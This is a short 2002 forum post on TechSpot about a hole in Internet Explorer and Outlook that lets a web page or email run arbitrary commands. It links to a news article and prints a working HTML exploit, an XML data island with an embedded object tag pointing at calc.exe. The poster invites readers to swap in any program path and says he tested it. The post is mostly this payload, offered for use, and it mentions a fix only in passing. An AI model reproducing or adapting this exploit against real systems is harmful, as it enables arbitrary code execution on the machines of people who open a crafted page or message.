TechSpot

Another IE/Outlook Hole

By lokem
Mar 6, 2002
  1. The Register has just posted that IE/Outlook can run arbitrary commands with a simple bit of HTML.

    Read the rest here:

    http://www.theregister.co.uk/content/4/24274.html

    The article also has a simple fix for this problem.

    Here's the simple script:

    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
    <security>
    <exploit>
    <![CDATA[
    <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
    ]]>
    </exploit>
    </security>
    </xml>


    Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary.
     
Topic Status:
Not open for further replies.

Similar Topics

Add New Comment

You need to be a member to leave a comment. Join thousands of tech enthusiasts and participate.
TechSpot Account You may also...